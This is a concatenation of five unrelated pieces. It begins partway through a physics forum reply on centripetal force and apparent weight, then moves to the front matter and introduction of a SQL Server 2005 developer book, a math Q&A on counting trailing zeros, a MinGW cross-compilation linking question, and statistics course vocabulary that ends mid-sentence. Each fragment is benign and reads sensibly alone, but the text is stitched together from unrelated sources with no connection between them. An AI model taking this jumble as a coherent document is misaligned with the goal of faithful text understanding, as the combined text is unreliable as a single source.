Since the weight is balanced exactly by this force, we must have
mg = mv^2/r, which gives v.
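Plugging in the numbers (an illustrative aside, not part of the original reply; note the mass m = 55 kg cancels out of mg = mv^2/r):

```python
import math

g = 9.8      # m/s^2
r = 6.4e6    # Earth's radius in metres (6400 km)

v = math.sqrt(r * g)        # speed at which the scale reads zero
T = 2 * math.pi * r / v     # one "day" = one full revolution at that speed

print(f"v = {v:.0f} m/s")                  # roughly 7.9 km/s
print(f"T = {T:.0f} s ({T/3600:.2f} h)")   # about 5100 s, i.e. ~1.4 hours
```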
#### bossman27
I keep trying to figure this one out, but with different ways Ive tried, I put Fg as 0 and it basically negates my whole equation. The section in the course we are on right now is Centrapetal force and gravitation.
The reason you can't set $F_{g} = 0$ is that it isn't 0. What you want is $F_{net} = 0 = F_{g} - F_{c} \Rightarrow F_{g} = F_{c}$
It looks like this is what you ended up doing, and I don't see any problems with your attempt. I don't think it was meant to be a hugely difficult problem.
Edit: To be completely accurate, the Earth's normal rotation already accounts for about 2 Newtons (or so, depending on your mass) of the centripetal requirement, so you could show how to find this "usual" centripetal term and then factor it in. Since a normal person weighs somewhere in the 600-ish Newton range, though, it only makes a small difference in your answer.
Last edited:
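For reference, the roughly 2 Newton figure above can be checked the same way (again an illustrative aside, assuming the current sidereal day length):

```python
import math

m = 55.0                 # kg
r = 6.4e6                # m
T_now = 86164.0          # current sidereal day, s

omega = 2 * math.pi / T_now
F_c = m * omega**2 * r   # centripetal requirement at today's rotation rate
print(f"{F_c:.1f} N")    # ~1.9 N, consistent with the ~2 N estimate
```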
|
# Microsoft SQL Server 2005 Developer's Guide - P0
Shared by: Cong Thanh | Date: | File type: PDF | Pages: 20
125 views | 64 downloads
## Microsoft SQL Server 2005 Developer’s Guide- P0
Document description
Microsoft SQL Server 2005 Developer's Guide - P0: This book is the successor to the SQL Server 2000 Developer's Guide, which was extremely successful thanks to all of the supportive SQL Server developers who bought that edition of the book. Our first thanks go to all of the people who encouraged us to write another book about Microsoft's incredible new relational database server: SQL Server 2005.
## Text content: Microsoft SQL Server 2005 Developer's Guide - P0
Microsoft® SQL Server™ 2005 Developer's Guide

Michael Otey
Denielle Otey

McGraw-Hill/Osborne
New York Chicago San Francisco Lisbon London Madrid Mexico City Milan New Delhi San Juan Seoul Singapore Sydney Toronto
Copyright © 2006 by The McGraw-Hill Companies. All rights reserved. Manufactured in the United States of America. Except as permitted under the United States Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher.

0-07-148348-9

The material in this eBook also appears in the print version of this title: 0-07-226099-8.

All trademarks are trademarks of their respective owners. Rather than put a trademark symbol after every occurrence of a trademarked name, we use names in an editorial fashion only, and to the benefit of the trademark owner, with no intention of infringement of the trademark. Where such designations appear in this book, they have been printed with initial caps.

McGraw-Hill eBooks are available at special quantity discounts to use as premiums and sales promotions, or for use in corporate training programs. For more information, please contact George Hoare, Special Sales, at [email protected] or (212) 904-4069.

TERMS OF USE

This is a copyrighted work and The McGraw-Hill Companies, Inc. ("McGraw-Hill") and its licensors reserve all rights in and to the work. Use of this work is subject to these terms. Except as permitted under the Copyright Act of 1976 and the right to store and retrieve one copy of the work, you may not decompile, disassemble, reverse engineer, reproduce, modify, create derivative works based upon, transmit, distribute, disseminate, sell, publish or sublicense the work or any part of it without McGraw-Hill's prior consent. You may use the work for your own noncommercial and personal use; any other use of the work is strictly prohibited. Your right to use the work may be terminated if you fail to comply with these terms.

THE WORK IS PROVIDED "AS IS." McGRAW-HILL AND ITS LICENSORS MAKE NO GUARANTEES OR WARRANTIES AS TO THE ACCURACY, ADEQUACY OR COMPLETENESS OF OR RESULTS TO BE OBTAINED FROM USING THE WORK, INCLUDING ANY INFORMATION THAT CAN BE ACCESSED THROUGH THE WORK VIA HYPERLINK OR OTHERWISE, AND EXPRESSLY DISCLAIM ANY WARRANTY, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. McGraw-Hill and its licensors do not warrant or guarantee that the functions contained in the work will meet your requirements or that its operation will be uninterrupted or error free. Neither McGraw-Hill nor its licensors shall be liable to you or anyone else for any inaccuracy, error or omission, regardless of cause, in the work or for any damages resulting therefrom. McGraw-Hill has no responsibility for the content of any information accessed through the work. Under no circumstances shall McGraw-Hill and/or its licensors be liable for any indirect, incidental, special, punitive, consequential or similar damages that result from the use of or inability to use the work, even if any of them has been advised of the possibility of such damages. This limitation of liability shall apply to any claim or cause whatsoever whether such claim or cause arises in contract, tort or otherwise.

DOI: 10.1036/0072260998
To Mom and Dad, Ray and Dortha Marty,
For many years of dedication and encouragement, and great bowling advice.
About the Authors

Michael Otey is Senior Technical Editor of SQL Server Magazine and co-author of SQL Server 2000 Developer's Guide, SQL Server 7 Developer's Guide, and ADO.NET: The Complete Reference. He is the president of TECA, Inc., a software development and consulting firm.

Denielle Otey is vice president of TECA, Inc. She has extensive experience developing commercial software products, and is the co-author of ADO.NET: The Complete Reference.
Contents

Acknowledgments  xiii
Introduction  xiv

Chapter 1  The Development Environment  1
  SQL Server Management Studio  2
  The SQL Server Management Studio User Interface  3
  SQL Server Management Studio User Interface Windows  4
  SQL Server 2005 Administrative Tools  14
  BI Development Studio  14
  The Business Intelligence Development Studio User Interface  16
  BI Development Studio User Interface Windows  16
  Summary  20

Chapter 2  Developing with T-SQL  21
  T-SQL Development Tools  22
  SQL Server Management Studio  22
  Visual Studio 2005  27
  Creating Database Objects Using T-SQL DDL  34
  Databases  35
  Tables  36
  Views  40
  Synonyms  41
  Stored Procedures  41
  Functions  43
  Triggers  45
  Security  46
  Storage for Searching  48
  Querying and Updating with T-SQL DML  49
  Select and Joins  49
  Modifying Data  65
  Error Handling  74
  Summary  75

Chapter 3  Developing CLR Database Objects  77
  Understanding CLR and SQL Server 2005 Database Engine  78
  CLR Architecture  79
  Enabling CLR Support  80
  CLR Database Object Components  80
  Creating CLR Database Objects  83
  CLR Stored Procedures  83
  User-Defined Functions  90
  Triggers  94
  User-Defined Types  99
  Aggregates  105
  Debugging CLR Database Objects  110
  .NET Database Object Security  112
  Managing CLR Database Objects  115
  Summary  115

Chapter 4  SQL Server Service Broker  117
  SQL Server Service Broker Architecture  118
  Messages  119
  Queues  120
  Contracts  120
  Services  120
  Dialogs  120
  Developing SQL Service Broker Applications  122
  SQL Server Service Broker DDL and DML  122
  T-SQL DDL  122
  T-SQL DML  122
  Enabling SQL Server Broker  122
  Using Queues  124
  Sample SQL Server Service Broker Application  125
  SQL Server Service Broker Activation  131
  Dialog Security  132
  System Views  132
  Summary  133

Chapter 5  Developing with Notification Services  135
  Notification Services Overview  136
  Events  136
  Subscriptions  138
  Notifications  138
  Developing Notification Services Applications  139
  Defining the Application  139
  Compiling the Application  139
  Building the Notification Subscription Management Application  140
  Adding Custom Components  140
  Notification Services Application Sample  140
  Creating the ICF File  140
  Defining the ADF File  144
  Building the Notification Services Application  152
  Updating Notification Services Applications  157
  Building a .NET Subscription/Event Application  158
  Listing Subscriptions  159
  Adding Subscriptions  160
  Deleting Subscriptions  163
  Firing the Data Event Using .NET  163
  Firing the Data Event Using T-SQL  166
  Summary  167

Chapter 6  Developing Database Applications with ADO.NET  169
  The ADO.NET Architecture  170
  ADO.NET Namespaces  172
  .NET Data Providers  172
  Namespaces for the .NET Data Providers  173
  Core Classes for the .NET Data Providers  175
  Core Classes in the ADO.NET System.Data Namespace  177
  DataSet  178
  DataTable  178
  DataColumn  179
  DataRow  180
  DataView  180
  DataViewManager  180
  DataRelation  181
  Constraint  181
  ForeignKeyConstraint  181
  UniqueConstraint  181
  DataException  182
  Using the .NET Framework Data Provider for SQL Server  182
  Adding the System.Data.SqlClient Namespace  182
  Using the SqlConnection Object  183
  The .NET Framework Data Provider for SQL Server Connection String Keywords  184
  Opening a Trusted Connection  186
  Using Connection Pooling  187
  Using the SqlCommand Object  190
  Executing Dynamic SQL Statements  191
  Executing Parameterized SQL Statements  193
  Executing Stored Procedures with Return Values  196
  Executing Transactions  198
  Using the SqlDependency Object  201
  Using the SqlDataReader Object  204
  Retrieving a Fast Forward–Only Result Set  205
  Reading Schema-Only Information  208
  Asynchronous Support  209
  Multiple Active Result Sets (MARS)  210
  Retrieving BLOB Data  212
  Using the SqlDataAdapter Object  215
  Populating the DataSet  215
  Using the CommandBuilder Class  216
  Summary  220

Chapter 7  Developing with XML  221
  The XML Data Type  222
  Data Validation Using an XSD Schema  223
  XQuery Support  227
  Querying Element Data  228
  XML Data Type Methods  231
  Exist(XQuery)  231
  Modify(XML DML)  232
  Query(XQuery)  233
  Value(XQuery, [node ref])  234
  XML Indexes  235
  Primary XML Indexes  235
  Secondary XML Indexes  235
  Using the For XML Clause  236
  For XML Raw  236
  For XML Auto  237
  For XML Explicit  237
  Type Mode  239
  FOR XML Path  240
  Nested FOR XML Queries  242
  Inline XSD Schema Generation  242
  OPENXML  244
  XML Bulk Load  245
  Native HTTP SOAP Access  247
  Creating SOAP Endpoints  247
  Using SOAP Endpoints  249
  Summary  253

Chapter 8  Developing Database Applications with ADO  255
  An Overview of OLE DB  256
  OLE DB Architecture Overview  256
  ADO (ActiveX Data Objects)  258
  OLE DB and ADO Files  260
  ADO Architecture  260
  An Overview of Using ADO  262
  Adding the ADO Reference to Visual Basic  263
  Using ADO Objects with Visual Basic  264
  Connecting to SQL Server  265
  Retrieving Data with the ADO Recordset  281
  Executing Dynamic SQL with the ADO Connection Object  305
  Modifying Data with ADO  307
  Executing Stored Procedures with Command Objects  316
  Error Handling  318
  Advanced Database Functions Using ADO  320
  Batch Updates  320
  Using Transactions  322
  Summary  324

Chapter 9  Reporting Services  325
  Reporting Services Architecture  326
  Reporting Services Components  327
  Installing Reporting Services  329
  Report Server  336
  Report Server Processors  337
  Report Server Extensions  338
  Report Manager  340
  Reporting Services Configuration and Management Tools  341
  Reporting Services Configuration Tool  342
  Report Server Command-Prompt Utilities  344
  Report Authoring Tools  348
  Report Designer  348
  Report Model Designer  353
  Report Builder  357
  Programmability  359
  Using URL Access in a Window Form  359
  Integrating Reporting Services Using SOAP  361
  Extensions  361
  RDL  362
  Accessing Reports  362
  Using URL Access  362
  URL Access Through a Form POST Method  363
  Report Authoring  363
  Development Stages  363
  Creating a Reporting Services Report  364
  Deploying a Reporting Services Report  369
  Running a Reporting Services Report  369
  Summary  371

Chapter 10  SQL Server Integration Services  373
  An Overview of SQL Server Integration Services  374
  Data Transformation Pipeline (DTP)  375
  Data Transformation Runtime (DTR)  376
  Creating Packages  377
  Using the SSIS Import and Export Wizard  377
  Using the SSIS Designer  378
  Using Breakpoints  395
  Using Checkpoints  397
  Using Transactions  398
  Package Security  399
  Deploying Packages  399
  Creating Configurations  400
  Using the Package Deployment Utility  403
  Programming with the SQL Server Integration Services APIs  404
  Summary  412

Chapter 11  Developing BI Applications with ADOMD.NET  415
  Analysis Services Overview  416
  XML for Analysis  417
  Analysis Management Objects (AMO) Overview  417
  ADOMD.NET Overview  418
  AMO Hierarchy  418
  ADOMD.NET Object Model  419
  Building a BI Application with ADOMD.NET  421
  Adding a Reference for ADOMD.NET  422
  Using the AdomdConnection Object  423
  Using the AdomdCommand Object  427
  Using the AdomdDataAdapter Object  434
  Using the CubeDef Object  436
  Summary  437

Chapter 12  Developing with SMO  439
  Using SMO  440
  Adding SMO Objects to Visual Studio  441
  Creating the Server Object  442
  Using SMO Properties  444
  SMO Property Collections  445
  SMO Hierarchy  449
  Building the SMO Sample Application  459
  Creating the Server Object  460
  Listing the Registered SQL Systems  461
  Connecting to the Selected SQL Server System  461
  Listing Databases  463
  Listing Tables  464
  Listing Columns  465
  Retrieving Column Attributes  467
  Creating Databases  468
  Transferring Tables  469
  Showing T-SQL Script for Tables  472
  SMO Error Handling  474
  Summary  475

Chapter 13  Using sqlcmd  477
  sqlcmd Components  478
  Command Shell  478
  Command-Line Parameters  479
  sqlcmd Extended Commands  484
  sqlcmd Variables  484
  Developing sqlcmd Scripts  485
  Developing sqlcmd Scripts with Query Editor  485
  Using sqlcmd Variables  487
  Using sqlcmd Script Nesting  488
  Using sqlcmd Variables and T-SQL Statements  489
  Summary  490

Appendix  SQL Profiler  491
  Starting SQL Profiler  491
  Starting, Pausing, and Stopping a Trace  496
  Replaying a Trace  497
  Showplan Events  497

Index  501
Acknowledgments

This book is the successor to the SQL Server 2000 Developer's Guide, which was extremely successful thanks to all of the supportive SQL Server developers who bought that edition of the book. Our first thanks go to all of the people who encouraged us to write another book about Microsoft's incredible new relational database server: SQL Server 2005. Making a book is definitely a team effort, and this book is the epitome of that. We'd like to extend our deepest gratitude to the team at McGraw-Hill/Osborne, who helped to guide and shape this book as it progressed through its many stages. First, we'd like to thank Wendy Rinaldi, editorial director, for her encouragement in getting this project launched and her ongoing support. We'd also like to thank acquisitions coordinator Alex McDonald for spearheading the effort to bring this project home. The book's content benefited immensely from the efforts of project editor Carolyn Welch, technical reviewer Karl Hilsmann, and copy editor Bob Campbell. We'd also like to thank Tom Rizzo and Bill Baker from Microsoft for helping us to better understand where the product is headed and the emerging importance of BI and SQL Server 2005.

Copyright © 2006 by The McGraw-Hill Companies.
Introduction

SQL Server 2005 is a feature-rich release that provides a host of new tools and technologies for the database developer. This book is written to help database developers and DBAs become productive immediately with the new features and capabilities found in SQL Server 2005. It covers the entire range of SQL Server 2005 development technologies, from server-side development using T-SQL to client-side development using ADO, ADO.NET, and ADOMD.NET. In addition, it shows how to develop applications using the new SQL Server 2005 Notification Services, SQL Server Service Broker, Reporting Services, and SQL Server Integration Services subsystems. The development and management tool landscape has changed tremendously in SQL Server 2005, so Chapter 1 starts off by providing a guided tour of the new development and management tools. Although SQL Server 2005 certainly embodies a huge number of significant changes, some things have stayed the same, and one of those things is the fact that T-SQL is still the native development language for SQL Server 2005 and is the core for all SQL Server 2005 database development. Chapter 2 shows you how to use the new T-SQL development tools found in both SQL Server 2005 and Visual Studio 2005, as well as how to create both T-SQL DDL and DML solutions. Chapter 3 dives into the new SQL CLR integration capabilities of SQL Server 2005. The integration of the .NET CLR runtime with SQL Server 2005 is one of the biggest changes in this release. This chapter shows you how to create and use all of the new SQL CLR database objects, including stored procedures, functions, triggers, user-defined types, and user-defined aggregates. Chapter 4 introduces the new SQL Server Service Broker subsystem, which provides the basis for building asynchronous applications. Both the SQL Service Broker chapter and the Notification Services chapter (Chapter 5) provide an overview of the new subsystem and then go on to show how it is used in a sample application. ADO.NET is Microsoft's core data access technology, and Chapter 6 illustrates how to use all the primary ADO.NET objects to create robust data applications. The integration of XML with the relational database engine is another one of the big enhancements in SQL Server 2005. Chapter 7 shows how to use the new XML data type for both typed and untyped data, as well as
how to create Web Services that expose SQL Server stored procedures for heterogeneous platform integration. While most of this book concentrates on the newest .NET and XML-based technologies, the majority of SQL Server client applications are written in ADO and VB6. Chapter 8 illustrates all of the primary ADO techniques for building SQL Server database applications. Two of the hottest technologies in SQL Server 2005 are Reporting Services and the end-user-oriented Report Builder report designer application. Chapter 9 dives into both of these new features, showing you how to build reports using Reporting Services as well as how to set up data models for use with Report Builder. Chapter 10 introduces the new SQL Server Integration Services subsystem. SQL Server Integration Services completely replaces the older DTS subsystem, and this chapter shows you how to build and deploy SSIS packages using the designer and the SSIS API. Chapter 11 illustrates building client Business Intelligence applications for Analysis Services using the new ADOMD.NET data access programming framework. SQL Server 2005 also introduces another completely new management framework called SQL Server Management Objects (SMO), which replaces the older Distributed Management Objects (DMO) framework that was used in earlier versions of SQL Server. In Chapter 12 you can see how SMO can be used to build your own customized SQL Server management applications. SQL Server 2005 also provides an entirely new command-line interface called sqlcmd that replaces the older isql and osql utilities. In Chapter 13 you can see how to develop management and data access scripts using the sqlcmd tool. Finally, this book concludes with an introduction to using SQL Profiler. SQL Profiler is a key tool both for troubleshooting application performance and for fine-tuning your data access queries. All of the code presented in this book is available for download from McGraw-Hill/Osborne's web site at www.osborne.com, and from our web site at www.teca.com.

SQL Server 2005's Design Goals

SQL Server 2005 faces a much different challenge today than it did in the eighties, when SQL Server was first announced. Back then, ease of use was a priority, and having a database scaled to suit the needs of a small business or a department was adequate. Today SQL Server is no longer a departmental database. It's a full-fledged enterprise database capable of providing data access functionality to the largest of organizations. To meet these enterprise demands, Microsoft has designed SQL Server 2005 to be highly scalable. In addition, it must also be secure; it must be easily integrated with other platforms; it must be a productive development platform; and it must provide a good return on investment.
Scalability

Scalability used to be an area where Microsoft SQL Server was criticized. With its roots as a departmental system and the limitations found in the Microsoft SQL Server 6.5 and earlier releases, many businesses didn't view SQL Server as a legitimate player in the enterprise database market. However, all that has changed. Beginning with the release of SQL Server 7, Microsoft made great strides in the scalability of the SQL Server platform. Using distributed partitioned views, SQL Server 7 jumped to the top of the TPC-C benchmark, and, in fact, its scores were so overwhelming that SQL Server 7 was a contributing factor in the decision of the TPC (Transaction Processing Performance Council) to break the transactional TPC-C test into clustered and nonclustered divisions. Although Microsoft and SQL Server 7 owned the clustered TPC-C score, demonstrating the platform's ability to scale out across multiple systems, there was still some doubt about its ability to scale up on a single system. That too changed with the launch of Windows Server 2003 and the announcement of SQL Server 2000 Enterprise Edition 64-bit, when Microsoft announced that for the first time Microsoft SQL Server reached the top of the nonclustered TPC-C scores. Today, with the predominance of web-based applications, scalability is more important than ever. Unlike traditional client/server and intranet applications, where you can easily predict the number of application users, web applications open the door to very large numbers of users and rapid changes in resource requirements. SQL Server 2005 embodies the accumulation of Microsoft's scalability efforts, and builds on both the ability to scale out using distributed partitioned views and the ability to scale up using its 64-bit edition. Its TPC-C scores clearly demonstrate that SQL Server 2005 can deal with the very largest of database challenges, even up to the mainframe level. And SQL Server 2005's self-tuning ability enables the database to quickly optimize its own resources to match usage requirements.

Security

While scalability is the stepping stone that starts the path toward enterprise-level adoption, security is the door that must be passed to really gain the trust of the enterprise. In the past, SQL Server, like many other Microsoft products, has been hit by a couple of different security issues. Both of these issues tended to be related to implementation problems rather than any real code defects. A study by one research firm showed that up to 5,000 SQL Server systems were deployed on the Internet with a blank sa password, allowing easy access to any intruders who wanted to compromise the information on those systems. Later, in January 2003, the SQL Slammer worm exploited a known SQL Server vulnerability for which Microsoft had previously released a fix and had even incorporated that fix into a general service pack.
In the first case, SQL Server essentially had the answer to this issue, supporting both standard security and Windows authentication; the users simply didn't take some very basic security steps. In the second case, Microsoft had released a fix for a known problem, but that fix wasn't widely applied. Plus, there was another basic security issue with this incident, in which one of the ports on the firewall that should have been closed was left open by the businesses that were stricken by this worm. To address these types of security challenges, SQL Server 2005 has been designed following Microsoft's new security framework, sometimes called SD3, where the product is secure by design, secure by default, and secure by deployment. What this means for SQL Server 2005 is that the product is initially designed with an emphasis on security. Following up on their Trustworthy Computing initiative, Microsoft embarked on extensive security training for all of their developers, conducted code reviews, and performed a comprehensive threat analysis for SQL Server 2005. In addition, all of the security fixes that were incorporated into SP3 of SQL Server 2000 were rolled into SQL Server 2005. Next, secure by default means that when the product is installed, Microsoft provides secure default values in the installation process, whereby if you just follow the defaults you will end up with a secure implementation. For example, in the case of the sa password, the installation process prompts you to provide a strong password for the sa account. While you can choose to continue the installation with a blank password, you have to explicitly select this path as well as respond to the Microsoft dialogs warning you about the dangers of using a blank password. Finally, SQL Server 2005 is secure by deployment, which means that Microsoft is providing tools and training for customers to help create secure deployments of SQL Server 2005. Here, Microsoft provides tools like the Microsoft Baseline Security Analyzer, which can scan for known security vulnerabilities, in addition to a collection of white papers that are designed to educate customers on the best practices for creating secure implementations for a variety of different deployment scenarios.

Integration

In today's corporate computing environment it's rarely the case that only one vendor's products are installed in a homogeneous setting. Instead, far more often, multiple dissimilar platforms simultaneously perform a variety of disparate tasks, and one of an organization's main challenges is exchanging information between these different platforms. SQL Server 2005 provides a number of different mechanisms to facilitate application and platform interoperability. For application interoperability, SQL Server 2005 supports the industry-standard HTTP, XML, and SOAP protocols. It also allows stored procedures to be exposed as web services and provides a level 4
JDBC driver, allowing SQL Server to be used as a back-end database for Java applications. For platform interoperability, SQL Server 2005 sports an all-new, redesigned Integration Services as well as heterogeneous database replication to Access, Oracle, and IBM DB2 UDB systems.

Productivity

Productivity is one of the other primary ingredients that enterprises require, and this is probably the area where SQL Server 2005 has made the biggest strides. The new release of SQL Server 2005 integrates the .NET Framework CLR into the SQL Server database engine. This new integration allows database objects like stored procedures, triggers, and user-defined functions to be created using any .NET-compliant language, including C#, VB.NET, managed C++, and J#. Prior to this release, SQL Server only supported the procedural T-SQL language for database programmability. The integration of the .NET Framework brings with it a fully object-oriented programming model that can be used to develop sophisticated data access and business logic routines. Being able to write database objects using the .NET languages also makes it easy to move those database objects between the database and the data access layer of an n-tiered web application. Although the big news with this release is the .NET Framework, Microsoft has continued to enhance T-SQL as well, bringing several new capabilities to its procedural language and giving developers and DBAs the reassurance that there are no plans to drop support for T-SQL in the future. In addition, SQL Server 2005 answers the question of productivity from the DBA's perspective as well. The management console has been redesigned and integrated into a Visual Studio .NET integrated development environment. All of the dialogs are now non-modal, allowing the DBA to easily switch between multiple management tasks.

Return on Investment

One of the primary challenges for IT enterprises today is driving cost out of their businesses. That often means doing more with less, and SQL Server provides the tools that most businesses need to do more with the assets they already have. SQL Server 2005 is far more than just a relational database; its tightly integrated Business Intelligence (BI) toolset, including the built-in Analysis Services and Reporting Services, brings more value to the table than any other database platform. BI gives companies the ability to analyze data and make better business decisions, decisions that can make your company money as well as save your company money. Since the release of SQL Server 7, with its integrated OLAP Services (later renamed Analysis Services), SQL Server has become the leading product in the BI market.
|
# What is the sum of occurrences of zeros at the end of integers up to the number $n$?
What is the sum of occurrences of zeros at the end of integers up to the number $n$? Let's call this function $O(n)$. Examples:
$1,2,3,4,5,6,7,8,9,10$, so $O(10)=1$
$1,\ldots,20$, so $O(20)=2$
$O(100)=11$
$O(200)=22$
$O(300)=33$
$O(1000)=111$
Would $O(0)=1$ as it ends in a zero? This could make for an unusual sequence or is this function defined only for Natural numbers? – JB King Mar 19 '13 at 16:28
@JB King good point, sometimes strange things happen around the zero :) – Qbik Mar 19 '13 at 16:30
Given a number $n$, the largest number of trailing zeros that any number in the range $(1,n)$ can have is one less than the number of digits of $n$, i.e. $\lfloor \log_{10}(n) \rfloor$. So we need to count the multiples of the powers of $10$ up to $10^{\lfloor \log_{10}(n) \rfloor}$: each power $10^i$ with $i \le \lfloor \log_{10}(n) \rfloor$ contributes $\lfloor \frac{n}{10^i}\rfloor$ occurrences. So we just have to sum all such occurrences:
$$O(n)=\sum^{\lfloor \log(n)\rfloor}_{i=1} \left\lfloor\dfrac{n}{ 10^i}\right\rfloor$$
If you want the number of zeros less than a number $n$, note that a zero gets added if we hit a multiple of $10$, $2$ zeros get added if we hit a multiple of $100$ and in general $k$ zeros get added if we hit a multiple of $10^k$. Hence, the number of zeros is $$\left\lfloor\dfrac{n}{10}\right\rfloor + \left\lfloor\dfrac{n}{10^2}\right\rfloor + \left\lfloor\dfrac{n}{10^3}\right\rfloor + \cdots$$
Yes, but what about a closed-form solution? It seems to have something to do with the $n(n+1)$ sum? – Qbik Mar 19 '13 at 16:23
@Qbik Just as in the $p$-adic valuation of $n!$, it's $(n - \delta(n))/9$, where $\delta(n)$ is the "sum of digits" function. It has nothing to do with $n(n+1)$ that I can tell. – Erick Wong Mar 19 '13 at 16:35
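For completeness, here is a small computational check of the formula (a sketch that is not from the original thread; Python 3 assumed):

    def O_closed(n):
        # O(n) = sum over i >= 1 of floor(n / 10^i)
        total, p = 0, 10
        while p <= n:
            total += n // p
            p *= 10
        return total

    def O_brute(n):
        # direct count of trailing zeros of every integer 1..n
        total = 0
        for k in range(1, n + 1):
            while k % 10 == 0:
                total += 1
                k //= 10
        return total

    assert O_closed(10) == 1 and O_closed(100) == 11 and O_closed(1000) == 111
    assert all(O_closed(n) == O_brute(n) for n in range(1, 2000))

The closed form $(n - \delta(n))/9$ mentioned above agrees as well, e.g. $(1000 - 1)/9 = 111$.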
|
# MinGW Windows Cross-Compile Error
While I was developing my game on Linux (I'm using an ARM system), I decided that I want to cross-compile it for Windows. Yet, I get an error when I try to link against Allegro (version 4.2).
I have installed MinGW32 (x86_64-w64-mingw32-c++ in the terminal) and have moved the bin / include / lib folders from the Windows Allegro version to the /usr/x86_64-w64-mingw32-c++/ folder.
When I enter into the command line:
x86_64-w64-mingw32-c++ *.cpp -o W_Survival `allegro-config --libs`
It returned to me a linking error:
/usr/bin/x86_64-w64-mingw32-ld: unrecognized option '-z'
/usr/bin/x86_64-w64-mingw32-ld: use the --help option for usage information
collect2: ld returned 1 exit status
The compilation is all the same as I would do using g++; the only thing different is that I have it set to compile for Windows.
Is there anything that I did wrong? All help is appreciated :)
• did you correctly link against a 64-bit mingw version of the allegro libs? – tubberd Feb 12 '16 at 15:33
• Oh my, that did the trick! After I put the 64-bit version in it all worked properly! Thanks! – PlatyPi Feb 13 '16 at 19:29
• I'll add that as an answer then :D – tubberd Feb 14 '16 at 14:40
• Do you mind accepting this as the answer? For one, this will help people who have the same or similar problems. – tubberd Feb 15 '16 at 1:07
|
# Statistical Sciences 1024A/B Final: Vocabulary/Definitions

Statistical Sciences 1024A/B, Professor Sohail Khan, Summer term.
Module One: Sampling

Population: the whole group of individuals.
Sample: the part of the population we collect information from.
Unit: an individual.
Parameter: a characteristic of the population we want to learn about.
Statistic: the sample version of a parameter.
Variable: a characteristic of an individual.
Sampling Design: describes exactly how to choose a sample from the population.
Census: information on the entire population (no sample).
Bias: errors in the way the sample represents the population.
Undercoverage: occurs when groups are left out.
Nonresponse: when individuals can't be contacted or won't participate.
Response Bias: behaviour of the respondent or interviewer alters answers.
Voluntary Response Sample: people who chose themselves by responding to a broad appeal; biased.
Convenience Sample: takes members of the population that are easiest to reach; unrepresentative.
Random Sampling: uses chance to select a sample.
Simple Random Sample (SRS): every individual has the same likelihood of being selected.
Stratified Random Sample: group into strata, then take an SRS within each stratum.
Cluster Sample: grouping people and using one entire group or several groups, but not others, as the sample.
Multistage Sample: e.g., a random sample of telephone exchanges stratified by region, an SRS of telephone numbers, and a random adult from each.

Module Two: Study Design

Observational Study: variables are observed/measured and recorded; does nothing to influence the individuals.
Confounding: when the effects of variables can't be distinguished from each other.
Response Variable: a particular quantity that we ask a question about.
Explanatory Variable/Factor: a factor that influences the response variable.
Experiment: individuals are influenced and then observed.
Levels: the specific values of a factor used in the experiment.
Treatment: a specific experimental condition applied to individuals.
Randomization: use chance to assign treatments.
Replication: use enough individuals to reduce chance variation in the results.
Control: control the effects of outside variables.
Completely Randomized Design: all subjects are allocated at random among all the treatments; can compare any number of treatments.
Randomized Block Design: the random assignment of individuals to treatments is done within each block.
Block: a group of individuals known to be similar before the experiment.
Placebo: a dummy treatment.
Blinding: subjects don't know which treatment is being received.
Double Blind: the subjects and the people who interact with them don't know which treatment they're receiving.
Statistical Significance: an effect so large that it would rarely occur by chance.
Matched Pairs Design: closely matched pairs are given different treatments to compare.

Module Three: Descriptive Stats, One Variable

Categorical Variable: places an individual in categories; the values are not meaningful numbers.
Pie chart: shows the distribution of a categorical variable as a "pie"; use when you want to emphasize each category's relation to the whole.
Bar graph: represents each category as a bar; shows category counts or percents; more flexible than pie charts.
Quantitative variables and data: deal with units of measurement; numerical values for which averaging makes sense.
Continuous: takes values on a continuum.
Discrete: takes a finite (countable) set of values.
Histogram: the most common graph of the distribution of one quantitative variable; percent is on the axis, unlike a bar graph.
Stemplot: for small data sets.
Boxplot: data represented as a box.
Frequency: the total number of occurrences.
Relative frequency: the frequency divided by the total number of observations.
Measures of centre:
Mean: the average of n values.
Median: the value that divides the dataset in half.
Measures of position (quartiles): Q1 and Q3 are the 25% and 75% points; the medians of the lower and upper halves of the data.
Measures of spread:
Range: maximum minus minimum.
Interquartile range: Q3 minus Q1.
Variance: the typical squared deviation between the observations and their mean.
Standard deviation: the square root of the sample variance.
Symmetry: the left and right sides of the histogram approximately mirror each other.
Skewness: one side extends farther than the other.
Outliers: an individual that falls outside the overall pattern.
Five number summary: Min, Q1, Med, Q3, Max.
outside the chart (if you know BAC vs. # of beers for 1-9 don’t guess about 12 or 20 because it could be different) Lurking variable: another variable Predicted (or fitted) value: line of regression Coefficient of determination: the proportion or fraction of total variation in y that is explained by the least squares regression line- the square of the correlation- COD= explained variation/explained + unexplained variation Residual: observed-predicted values (actual point and line) Residual plot: x is the same, y is residuals Module Six: Quantifying Uncertainty Randomness: a property of a phenomenon whose outcomes cannot be predicted in short run but that behaves in a certain way in the long run Experiment: a process for which a single outcome occurs but in which there are more than one possible outcomes. Thus, we are uncertain which outcome will occur and cannot predict this outcome in advance. Sample space: The sample space, denoted by S, of an experiment is the set of all possible outcomes of the experiment. Let us consider sample space for an experiment when we toss three coins: S = {HHH, HHT, HTH, THH, HTT, THT, TTH, TTT}. Simple event and event: An event A is a subset of the sample space S. It is a set containing a subset of the outcomes of a particular interest. In roll of a die ("die" is the singular form of "dice"), our interest might be if die showed an even number. This event will have 3 outcomes. Each outcome is called a simple event. Venn diagram: used to represent samples spaces and events Rules of Probability: Conditional probability: Disjoint (i.e., mutually exclusive) events: events which cannot occur together. In other words, one stops the occurrence of the other Independent events: Independence implies that occurrence of one event does not affect the occurrence (or non- occurrence) of the other event. Two-way tables and probability trees: Random variable: variable which takes numerical values corresponding to outcomes of a random phenomenon Probability distribution: a rule, formula or function which tells us which values the random variable can take on and provides us a method to assign probabilities to these values of the random variable. Discrete probability models: probabilities associated with fixed outcomes in a sample space Continuous probability models: describes the pattern of a random phenomenon using a density curve Module Seven: Variables and Distributions Random variables: a variable which takes numerical values corresponding to outcomes of a random phenomenon Histograms: summarize observed quantitative data. Density curves are often used to model (or describe) results of random phenomena. For the theory (i.e., the model) to coincide with the data, then, the histogram and the density curve should be similar. Density curves: A density curve describes the theoretical 